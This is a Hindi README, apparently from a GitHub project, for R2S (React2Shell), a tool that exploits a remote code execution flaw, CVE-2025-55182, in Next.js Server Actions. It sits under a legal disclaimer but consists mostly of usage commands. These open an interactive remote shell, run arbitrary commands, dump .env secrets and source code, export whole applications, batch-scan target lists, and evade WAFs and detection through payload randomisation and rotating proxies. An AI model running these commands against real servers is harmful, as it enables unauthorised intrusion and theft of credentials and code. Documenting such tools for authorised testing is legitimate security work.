
Next.js अनुप्रयोगों में CVE-2025-55182 भेद्यता मूल्यांकन के लिए उन्नत सुरक्षा परीक्षण उपकरण। इसमें इंटरैक्टिव शेल, बैच स्कैनिंग, WAF बायपास और व्यापक रिपोर्टिंग सुविधाएँ शामिल हैं।
CVE-2025-55182 भेद्यता आकलन के लिए उन्नत शोषण परीक्षण उपकरण
विशेषताएँ • स्थापना • उपयोग • परीक्षण वातावरण • कानूनी अस्वीकरण
R2S (React2Shell) एक सुरक्षा परीक्षण उपकरण है जिसे सुरक्षा शोधकर्ताओं, डेवलपर्स और पैठ परीक्षकों की यह आकलन करने में सहायता करने के लिए डिज़ाइन किया गया है कि उनके Next.js अनुप्रयोग CVE-2025-55182 के प्रति भेद्य हैं या नहीं।
CVE-2025-55182 एक गंभीर भेद्यता है जो कुछ संस्करणों (जैसे, 16.0.5) में Next.js Server Actions को प्रभावित करती है। यह भेद्यता हमलावरों को अनुचित रूप से सुरक्षित Server Actions के माध्यम से सर्वर पर मनमाने कमांड निष्पादित करने की अनुमति देती है, जिससे Remote Code Execution (RCE) होता है।
R2S आपको यह जाँचने में मदद करता है कि आपके एप्लिकेशन में यह समस्या है या नहीं, ताकि आप इसे हमलावरों के पता लगाने से पहले ठीक कर सकें।
--windows)⚠️ गंभीर चेतावनी: --windows फ़्लैग का उपयोग गलत तरीके से करने पर उपकरण भेद्यता का निर्धारण करने में विफल हो सकता है।
--windows का उपयोग कब करें: केवल तभी जब आप 100% आश्वस्त हों कि लक्ष्य सर्वर Windows है--windows का उपयोग करते हैं, तो कमांड विफल हो जाएंगे और उपकरण "भेद्य नहीं" रिपोर्ट कर सकता है, भले ही सर्वर भेद्य हो--windows का उपयोग न करेंउदाहरण:```bash
r2s -u http://linux-server.com -t --windows
r2s -u http://linux-server.com -t
---
## ⚠️ कानूनी अस्वीकरण
**महत्वपूर्ण: इस टूल का उपयोग करने से पहले इसे पढ़ें**
1. **यह टूल केवल वैध सुरक्षा परीक्षण के लिए है**
- ✅ अपने स्वयं के अनुप्रयोगों का परीक्षण करें
- ✅ उन अनुप्रयोगों का परीक्षण करें जिनके परीक्षण के लिए आपके पास लिखित अनुमति है
- ✅ शैक्षिक उद्देश्य और सुरक्षा अनुसंधान
- ❌ **ऐसे सिस्टम पर कभी उपयोग न करें जो आपके स्वामित्व में नहीं हैं या जिनके परीक्षण की अनुमति आपके पास नहीं है**
- ❌ **दुर्भावनापूर्ण उद्देश्यों के लिए कभी उपयोग न करें**
2. **इस टूल का उपयोग करके, आप सहमत हैं कि:**
- आप इसका उपयोग केवल उन सिस्टम पर करेंगे जो आपके स्वामित्व में हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है
- आप समझते हैं कि कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है
- आप अपने कार्यों की पूर्ण जिम्मेदारी स्वीकार करते हैं
- लेखक इस टूल के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं हैं
3. **कानूनी परिणाम:**
- अधिकांश देशों में कंप्यूटर सिस्टम तक अनधिकृत पहुंच एक अपराध है
- आप पर आपराधिक आरोप, जुर्माना और कारावास हो सकता है
- परीक्षण से पहले हमेशा लिखित अनुमति लें
4. **यह टूल बिना किसी वारंटी के "जैसा है" (AS IS) प्रदान किया गया है**
**यदि आप 18 वर्ष से कम हैं, तो इस टूल का उपयोग करने से पहले सुनिश्चित करें कि आपके पास वयस्क पर्यवेक्षण और अनुमति है।**
---
## ✨ विशेषताएँ
### मुख्य क्षमताएँ
- 🔍 **भेद्यता का पता लगाना** - जाँचें कि सर्वर CVE-2025-55182 के लिए संवेदनशील है या नहीं
- 💻 **इंटरैक्टिव शेल** - कमांड इतिहास के साथ HTTPS पर पूर्ण इंटरैक्टिव शेल सत्र
- 📁 **फ़ाइल संचालन** - निर्देशिकाएँ सूचीबद्ध करें, फ़ाइलें पढ़ें, और फ़ाइलें/संग्रह निर्यात करें
- 🔐 **गोपनीय जानकारी निकालना** - एप्लिकेशन गोपनीय जानकारी (.env फ़ाइलें, कॉन्फ़िग फ़ाइलें) पढ़ने का प्रयास करता है
- 📄 **कोड निकालना** - एप्लिकेशन स्रोत कोड पढ़ने का प्रयास करता है
- 🖥️ **सिस्टम जानकारी** - OS जानकारी, होस्टनाम, उपयोगकर्ता और पर्यावरण चर एकत्र करें
### उन्नत विशेषताएँ
- 🚀 **ऑटो-वार्मिंग पेलोड** - सर्वोत्तम परिणामों के लिए पेलोड को स्वचालित रूप से अनुकूलित करता है
- ⚡ **समानांतर निष्पादन** - एक साथ कई कमांड चलाएँ
- 🎲 **पेलोड रैंडमाइज़ेशन** - गतिशील पेलोड के साथ पहचान से बचें
- 🛠️ **एक्सप्लॉइट मॉड्यूल** - Metasploit-शैली मॉड्यूल प्रणाली (env_dump, file_search, network_scan, process_list)
- 🔄 **रीडायरेक्ट हैंडलिंग** - HTTP रीडायरेक्ट (301, 302, 303, 307, 308) को स्वचालित रूप से फ़ॉलो करता है
- 🎨 **सुंदर UI** - आसान पढ़ने के लिए रंग-कोडित आउटपुट
- 📊 **व्यापक रिपोर्टिंग** - ऑपरेशन-विशिष्ट फ़ॉर्मेटर्स के साथ JSON, HTML, TXT प्रारूपों में रिपोर्ट स्वतः सहेजें
- ⚙️ **कॉन्फ़िगरेशन प्रणाली** - इंटरैक्टिव सेटिंग्स पैनल के साथ JSON-आधारित कॉन्फ़िग
- 📦 **निर्यात कार्यक्षमता** - एकल फ़ाइलें या संपूर्ण ऐप निर्देशिकाओं को zip संग्रह के रूप में निर्यात करें
- 🔒 **WAF बायपास** - कई बायपास तकनीकें (⚠️ गारंटी नहीं - नीचे सीमाएँ देखें)
### रिपोर्टिंग और लॉगिंग
- 📝 **ऑटो-सेव रिपोर्ट** - मानव-पठनीय टाइमस्टैम्प के साथ रिपोर्ट को `~/.r2s/reports/` में स्वचालित रूप से सहेजें
- 📋 **ऑपरेशन-विशिष्ट प्रारूप** - विभिन्न ऑपरेशनों के लिए अलग-अलग रिपोर्ट प्रारूप (शेल, परीक्षण, गोपनीय जानकारी, आदि)
- 📜 **कमांड इतिहास** - `~/.r2s/history` में सहेजा गया स्थायी कमांड इतिहास
- 🔍 **ऑडिट ट्रेल** - `~/.r2s/logs/audit.log` में सभी ऑपरेशनों की विस्तृत लॉगिंग
- 🎨 **HTML रिपोर्ट** - डार्क/लाइट मोड, कॉपी बटन और कोड ब्लॉक के साथ सुंदर HTML रिपोर्ट
---
## 📦 इंस्टॉलेशन
### विकल्प 1: स्रोत से बिल्ड करें (अनुशंसित)
1. **रिपॉजिटरी क्लोन करें:** ```bash
git clone https://github.com/zamdevio/r2s.git
cd r2s
pip install -r requirements.txt
python3 -m react2shell.main --help
r2s --help
---
## 🚀 त्वरित आरंभ
### बुनियादी भेद्यता परीक्षण```bash
# Test if a server is vulnerable
r2s -u http://localhost:3000 -t
# With verbose output for more details
r2s -u http://localhost:3000 -t -v
⚠️ महत्वपूर्ण: जब तक आपको यकीन न हो कि लक्ष्य Windows है, --windows का उपयोग न करें। Linux सर्वर पर --windows का उपयोग करने से गलत नकारात्मक परिणाम आ सकते हैं (टूल "असुरक्षित नहीं" रिपोर्ट कर सकता है, भले ही सर्वर असुरक्षित हो)।
We provide a safe testing environment at **https://r2s-arena.fly.dev**:```bash
r2s -u https://r2s-arena.fly.dev -t
### स्थानीय रूप से परीक्षण करें
स्थानीय रूप से भेद्य ऐप चलाने के निर्देशों के लिए [`nextjs/README.md`](https://github.com/zamdevio/r2s/blob/HEAD/nextjs/README.md) देखें।
---
## 📚 उपयोग उदाहरण
### त्वरित कमांड संदर्भ
**सबसे सामान्य कमांड:**
- `r2s -u URL -t` - भेद्यता के लिए परीक्षण करें (सबसे सामान्य)
- `r2s -u URL --shell` - इंटरैक्टिव शेल शुरू करें
- `r2s --targets FILE -t` - कई लक्ष्यों का बैच स्कैन करें
- `r2s -u URL --system-info` - सिस्टम जानकारी प्राप्त करें
- `r2s -u URL --secrets` - सीक्रेट पढ़ने का प्रयास करें
- `r2s -u URL --export-archive` - संपूर्ण ऐप को zip के रूप में निर्यात करें
**⚠️ याद रखें**: जब तक लक्ष्य Windows न हो, `--windows` का उपयोग न करें!
---
### मूल संचालन```bash
# Test vulnerability
r2s -u http://localhost:3000 -t
# List directory contents
r2s -u http://localhost:3000 --list-dir /app
# Read files
r2s -u http://localhost:3000 --read-file .env
r2s -u http://localhost:3000 --read-file package.json
# Get system information
r2s -u http://localhost:3000 --system-info
# Execute custom commands
r2s -u http://localhost:3000 --command "whoami"
r2s -u http://localhost:3000 --command "uname -a"
r2s -u http://localhost:3000 --shell
### एक्सप्लॉइट मॉड्यूल```bash
# List available modules
r2s --list-modules
# Use a module
r2s -u http://localhost:3000 --module env_dump
# Use module with options
r2s -u http://localhost:3000 --module file_search --set pattern="*.env" --set path="/app"
# Get module information
r2s --module-info env_dump
r2s -u http://localhost:3000 --export src/app/page.tsx
r2s -u http://localhost:3000 --export-archive
r2s settings
### गोपनीय जानकारी और कोड निष्कर्षण```bash
# Attempt to read application secrets
r2s -u http://localhost:3000 --secrets
# Tries: .env, .env.local, .env.production, config.json, etc.
# Attempt to read application source code
r2s -u http://localhost:3000 --code
# Tries: src/**/*.ts, src/**/*.tsx, src/**/*.js, etc.
r2s --targets targets.txt -t
r2s --targets targets.txt --batch -t
r2s --targets targets.txt -t --rate 2
r2s --targets targets.txt -t --delay 1
r2s --targets targets.txt --batch -t --rate 1 --delay 2
### उन्नत विकल्प```bash
# Parallel execution (run multiple commands simultaneously)
r2s -u http://localhost:3000 --parallel 5 --command "whoami;id;uname -a"
# WAF bypass (⚠️ Not guaranteed - see limitations below)
r2s -u http://localhost:3000 -t --waf-bypass
# Auto-warm payloads (optimize payloads before execution)
r2s -u http://localhost:3000 -t --auto-warm
# Randomize payloads (evade static detection)
r2s -u http://localhost:3000 --command "whoami" --randomize
# Different header strategies
r2s -u http://localhost:3000 -t --header-strategy chrome_latest
# Options: default, chrome_latest, firefox, minimal, assetnote
# Custom timeout (0 = no timeout)
r2s -u http://localhost:3000 --command "long-running-command" --timeout 0
# Disable SSL verification
r2s -u https://target.com -t --insecure
# Rate limiting (requests per second)
r2s -u http://localhost:3000 -t --rate 2
# Delay between requests (seconds)
r2s -u http://localhost:3000 --command "whoami" --delay 1
r2s -u http://localhost:3000 -t --proxy http://proxy.example.com:8080
r2s -u http://localhost:3000 -t --proxy http://user:[email protected]:8080
r2s -u http://localhost:3000 -t --proxy-file proxies.txt
r2s --targets targets.txt -t --proxy-file proxies.txt --rate 1
### लॉगिंग और ऑडिट```bash
# Log all operations to specific file
r2s -u http://localhost:3000 -t --log r2s_session.log
# Create detailed audit trail (saved to ~/.r2s/logs/audit.log)
r2s -u http://localhost:3000 -t --audit
# Combine logging with batch scanning
r2s --targets targets.txt --batch -t --log batch_scan.log --audit
r2s settings
r2s cleanup
r2s uninstall
### रिपोर्टिंग```bash
# Reports are auto-saved to ~/.r2s/reports/ by default
# Format: {operation}_{YYYYMMDD_HHMMSS}.{json,html,txt}
# Disable auto-save
r2s -u http://localhost:3000 -t --no-report
# Save to specific location (disables auto-save)
r2s -u http://localhost:3000 -t --output /path/to/report.json
# View reports
ls ~/.r2s/reports/
cat ~/.r2s/reports/test_20251206_120000.html
cd my-nextjs-app npm run dev
r2s -u http://localhost:3000 -t
### 2. सुरक्षा ऑडिट```bash
# Comprehensive security check
r2s -u http://localhost:3000 -t --waf-bypass
r2s -u http://localhost:3000 --system-info
r2s -u http://localhost:3000 --secrets
r2s -u http://localhost:3000 --code
r2s -u http://localhost:3000 --export-archive
प्रदान किए गए nextjs एप्लिकेशन का उपयोग सुरक्षित, स्थानीय परीक्षण के लिए करें:```bash
cd nextjs
npm install
npm run dev
r2s -u http://localhost:3000 -t
विस्तृत निर्देशों के लिए [`nextjs/README.md`](https://github.com/zamdevio/r2s/blob/HEAD/nextjs/README.md) देखें।
---
## 🏗️ आर्किटेक्चर
R2S अनुरक्षणीयता और विस्तारशीलता के लिए एक मॉड्यूलर आर्किटेक्चर का उपयोग करता है:```
react2shell/
├── main.py # Main entry point
├── classes/ # Core classes
│ ├── detector.py # Target detection
│ ├── executor.py # Command execution
│ ├── modules.py # Exploit modules system
│ ├── operations.py # High-level operations
│ ├── payload.py # Payload building and randomization
│ └── shell.py # Interactive shell
├── services/ # Services
│ ├── config.py # Configuration management (JSON)
│ ├── exporter.py # File and archive export
│ ├── formatters.py # Report formatters
│ ├── history.py # Command history
│ ├── logger.py # Logging and audit trails
│ ├── proxy.py # Proxy management
│ └── reporter.py # Report generation
└── utils/ # Utilities
├── colors.py # Color utilities
└── helpers.py # Helper functions
विस्तृत आर्किटेक्चर दस्तावेज़ीकरण के लिए react2shell/README.md देखें।
हम एक सुरक्षित परीक्षण वातावरण प्रदान करते हैं जिसे nextjs कहा जाता है, जिसका उपयोग आप वास्तविक सिस्टम को जोखिम में डाले बिना टूल का परीक्षण करने के लिए कर सकते हैं।
विज़िट करें: https://r2s-arena.fly.dev
यह एक सार्वजनिक रूप से उपलब्ध, जानबूझकर असुरक्षित एप्लिकेशन है जो केवल परीक्षण उद्देश्यों के लिए है।
इसे स्थानीय रूप से चलाने के निर्देशों के लिए nextjs/README.md देखें।
⚠️ महत्वपूर्ण: nextjs एप्लिकेशन जानबूझकर असुरक्षित है और इसे कभी भी प्रोडक्शन या वास्तविक डेटा के साथ उपयोग नहीं किया जाना चाहिए।
| कमांड | विवरण |
|---|---|
--export FILE, --ex FILE | लक्ष्य से एक फ़ाइल एक्सपोर्ट करें (~/.r2s/exports/{domain}/ में सहेजी जाती है) |
--export-archive | पूरी ऐप निर्देशिका को ज़िप आर्काइव के रूप में एक्सपोर्ट करें। सर्वर पर ज़िप बनाता है, उसे डाउनलोड करता है, फिर सर्वर से हटा देता है। .gitignore पैटर्न को बाहर रखता है। ~/.r2s/exports/{domain}/r2s_export_TIMESTAMP.zip में सहेजा जाता है। |
| कमांड | विवरण |
|---|---|
--module NAME | एक्सप्लॉइट मॉड्यूल निष्पादित करें |
--module-list, --list-modules | उपलब्ध मॉड्यूल सूचीबद्ध करें |
| विकल्प | विवरण |
|---|---|
--output FILE, -o FILE | परिणामों को विशिष्ट फ़ाइल में सहेजें (ऑटो-सेव अक्षम करता है) |
| विकल्प | विवरण |
|---|---|
--targets FILE | फ़ाइल से कई लक्ष्यों को स्कैन करें (प्रति पंक्ति एक URL, # के साथ टिप्पणियाँ समर्थित) |
--batch | बैच मोड: सभी इंटरैक्टिव प्रॉम्प्ट छोड़ें, स्वतः जारी रखें (ऑटोमेशन/स्क्रिप्ट के लिए उपयोगी) |
| कमांड | विवरण |
|---|---|
r2s settings | इंटरैक्टिव सेटिंग्स पैनल खोलें |
r2s cleanup | सभी R2S डेटा हटाएँ (कॉन्फ़िग, इतिहास, लॉग, रिपोर्ट, एक्सपोर्ट) |
r2s -u https://target.com -t --insecure
### "कनेक्शन त्रुटि"
- जाँचें कि सर्वर चल रहा है या नहीं
- सत्यापित करें कि URL सही है
- फ़ायरवॉल सेटिंग्स जाँचें
- टाइमआउट बढ़ाने का प्रयास करें: `--timeout 30`
### "अनुरोध अवरुद्ध"```bash
# Try WAF bypass (⚠️ Not guaranteed - see WAF Bypass Limitations below)
r2s -u https://target.com -t --waf-bypass
# Try different header strategies
r2s -u https://target.com -t --header-strategy chrome_latest
r2s -u https://target.com -t --header-strategy firefox
⚠️ महत्वपूर्ण: विंडोज़ कमांड फ़्लैग
यदि आपको गलत नकारात्मक परिणाम मिल रहे हैं (टूल कहता है "भेद्य नहीं" लेकिन लक्ष्य वास्तव में भेद्य है), तो जाँचें:
क्या आपने --windows फ़्लैग का उपयोग किया है?
--windows फ़्लैग टूल को विंडोज़ कमांड (PowerShell, dir, आदि) उपयोग करने के लिए बनाता है--windows का उपयोग करने से टूल विफल हो जाएगा--windows फ़्लैग हटाएँ (Unix/Linux डिफ़ॉल्ट है)प्लेटफ़ॉर्म पहचान
--windows का उपयोग करें यदि आप 100% आश्वस्त हैं कि लक्ष्य विंडोज़ हैपरीक्षण कमांड
echo $((41*271))--windows के साथ, यह उपयोग करता है: powershell -c "41*271"समस्या का उदाहरण:```bash
r2s -u http://linux-server.com -t --windows
r2s -u http://linux-server.com -t
### WAF बाईपास सीमाएँ
**⚠️ महत्वपूर्ण:** इस टूल में WAF बाईपास तकनीकों के काम करने की **गारंटी नहीं है** और उनकी कई सीमाएँ हैं:
- **सार्वभौमिक नहीं**: अलग-अलग WAF अलग-अलग पहचान विधियों का उपयोग करते हैं। जो एक के लिए काम करता है, वह दूसरे के लिए काम नहीं कर सकता।
- **स्थैतिक पहचान**: कुछ WAF स्थैतिक पैटर्न मिलान का उपयोग करते हैं जिसे बाईपास किया जा सकता है, लेकिन आधुनिक WAF व्यवहारिक विश्लेषण का उपयोग करते हैं।
- **दर सीमा**: कई WAF दर सीमा लागू करते हैं जो बार-बार के प्रयासों को रोक सकती है।
- **मशीन लर्निंग**: उन्नत WAF मशीन लर्निंग मॉडल का उपयोग करते हैं जो हमले के पैटर्न से अनुकूलन और सीखते हैं।
- **Cloudflare/AWS WAF**: एंटरप्राइज़-ग्रेड WAF (Cloudflare, AWS WAF, आदि) को बाईपास करना अत्यंत कठिन है।
- **कोई गारंटी नहीं**: बाईपास तकनीकें प्रयोगात्मक हैं और अच्छी तरह से कॉन्फ़िगर किए गए WAF के सामने विफल हो सकती हैं।
**सर्वोत्तम अभ्यास:**
- WAF बाईपास का उपयोग अंतिम विकल्प के रूप में करें
- अलग-अलग हेडर रणनीतियाँ आज़माएँ (`--header-strategy`)
- बेहतर परिणामों के लिए `--randomize` के साथ संयोजन करें
- समझें कि कुछ लक्ष्यों को बाईपास करना असंभव हो सकता है
- हमेशा उन सिस्टमों पर परीक्षण करें जिनके आप मालिक हैं या जिनके परीक्षण की अनुमति आपके पास है
### बिल्ड समस्याएँ```bash
# Make sure Python 3.7+ is installed
python3 --version
# Install dependencies
pip install -r requirements.txt
# Clean previous build artifacts
./build.sh cleanup
# Try building again
./build.sh
सभी बिल्ड आर्टिफैक्ट्स (बिल्ड डायरेक्टरी, कैश फ़ाइलें, आदि) को सुरक्षित रूप से हटाने के लिए:```bash ./build.sh cleanup
यह निम्नलिखित हटाएगा:
- `build/` डायरेक्टरी (PyInstaller बिल्ड फ़ाइलें)
- `dist/` डायरेक्टरी (संकलित बाइनरी)
- `__pycache__/` डायरेक्टरीज़ (Python कैश, पुनरावर्ती रूप से)
- `*.pyc` फ़ाइलें (संकलित Python बाइटकोड)
- `*.pyo` फ़ाइलें (अनुकूलित Python बाइटकोड)
- `*.spec` फ़ाइलें (PyInstaller spec फ़ाइलें)
**नोट:** यह केवल बिल्ड आर्टिफैक्ट्स हटाता है, आपका सोर्स कोड नहीं। सफाई सुरक्षित है और आगे बढ़ने से पहले पुष्टि मांगेगी।
---
## 📁 फ़ाइल संरचना```
r2s/
├── README.md # This file
├── LICENSE # MIT License
├── requirements.txt # Python dependencies
├── build.sh # Build script for standalone binary
├── r2s_entry.py # PyInstaller entry point
├── react2shell/ # Main package
│ ├── README.md # Architecture documentation
│ ├── main.py # Entry point
│ ├── classes/ # Core classes
│ ├── services/ # Services
│ └── utils/ # Utilities
└── nextjs/ # Testing environment
└── README.md # Testing environment documentation
योगदान का स्वागत है! कृपया:
याद रखें: केवल वही कोड योगदान करें जो वैध सुरक्षा परीक्षण में सहायक हो।
यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।
हालांकि, इस टूल का उपयोग उपरोक्त कानूनी अस्वीकरण के अधीन है। अनधिकृत पहुंच के लिए इस टूल का उपयोग अवैध है और यह इस लाइसेंस के अंतर्गत कवर नहीं है।
zamdevio
यह टूल केवल सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है।
कानूनी रहें, नैतिक रहें, सुरक्षित रहें! 🛡️
सुरक्षा समुदाय के लिए ❤️ के साथ बनाया गया
| कमांड | विवरण |
|---|
-u, --url URL | लक्ष्य URL (अधिकांश कार्यों के लिए आवश्यक) |
-t, --test | जाँचें कि सर्वर असुरक्षित है या नहीं |
-ld, --list-dir PATH | निर्देशिका सामग्री सूचीबद्ध करें |
-rf, --read-file FILE | फ़ाइल सामग्री पढ़ें |
-si, --system-info | सिस्टम जानकारी प्राप्त करें |
-sr, --secrets | गोपनीय जानकारी (secrets) पढ़ने का प्रयास करें |
-c, --code | स्रोत कोड पढ़ने का प्रयास करें |
-cmd, --command CMD | कस्टम कमांड निष्पादित करें |
--shell | इंटरैक्टिव शेल प्रारंभ करें |
--module-info NAME | मॉड्यूल जानकारी दिखाएँ |
--set KEY=VALUE | मॉड्यूल विकल्प सेट करें |
| विकल्प | विवरण |
|---|
--waf-bypass | WAF बायपास तकनीकों का प्रयास करें (⚠️ गारंटी नहीं - नीचे सीमाएँ देखें) |
--waf-bypass-size KB | KB में WAF बायपास जंक डेटा आकार (डिफ़ॉल्ट: 128) |
--vercel-waf-bypass | Vercel-विशिष्ट WAF बायपास तकनीकें सक्षम करें |
--header-strategy STRATEGY | HTTP हेडर रणनीति: default, chrome_latest, firefox, minimal, assetnote |
--parallel N | N कमांड समानांतर में निष्पादित करें (कई कमांड के लिए उपयोगी) |
--auto-warm | निष्पादन से पहले पेलोड को स्वचालित रूप से वार्म और अनुकूलित करें |
--randomize | स्टैटिक डिटेक्शन से बचने के लिए पेलोड को रैंडमाइज़ करें |
--no-follow-redirects | HTTP रीडायरेक्ट (301, 302, आदि) का स्वचालित रूप से अनुसरण न करें |
-k, --insecure | SSL प्रमाणपत्र सत्यापन अक्षम करें (सावधानी से उपयोग करें) |
--timeout SECONDS | सेकंड में अनुरोध टाइमआउट (डिफ़ॉल्ट: 10, कोई टाइमआउट नहीं के लिए 0 उपयोग करें) |
--windows | ⚠️ चेतावनी: Unix/Linux के बजाय Windows कमांड का उपयोग करें। यदि लक्ष्य वास्तव में Unix/Linux है, तो यह टूल को भेद्यता निर्धारित करने में विफल कर सकता है। केवल तभी उपयोग करें जब आपको निश्चित है कि लक्ष्य Windows है। |
--rate RATE | अनुरोधों को प्रति सेकंड RATE अनुरोधों तक सीमित करें (बैच स्कैनिंग के लिए उपयोगी) |
--delay SECONDS | अनुरोधों के बीच सेकंड में देरी जोड़ें (रेट लिमिटिंग से बचने में मदद करता है) |
--batch | बैच मोड: सभी इंटरैक्टिव प्रॉम्प्ट छोड़ें, स्वतः जारी रखें (ऑटोमेशन के लिए उपयोगी) |
--no-report | ~/.r2s/reports/ में स्वचालित रिपोर्ट सहेजना अक्षम करें |
--log FILE | सभी ऑपरेशनों को निर्दिष्ट फ़ाइल में लॉग करें (विस्तृत ऑपरेशन लॉग) |
--audit | विस्तृत ऑडिट ट्रेल बनाएँ (~/.r2s/logs/audit.log में सहेजा जाता है) |
| विकल्प | विवरण |
|---|
--proxy URL | HTTP प्रॉक्सी का उपयोग करें (प्रारूप: http://proxy:port या http://user:pass@proxy:port) |
--proxy-file FILE | फ़ाइल से प्रॉक्सी लोड और रोटेट करें (प्रति पंक्ति एक प्रॉक्सी, प्रारूप: http://proxy:port) |
--rate RATE | अनुरोधों को प्रति सेकंड RATE अनुरोधों तक सीमित करें (लक्ष्य पर अत्यधिक भार रोकता है) |
--delay SECONDS | अनुरोधों के बीच सेकंड में देरी जोड़ें (रेट लिमिटिंग से बचने में मदद करता है) |
r2s uninstall | R2S बाइनरी और सभी डेटा अनइंस्टॉल करें |
r2s help | सहायता संदेश दिखाएँ |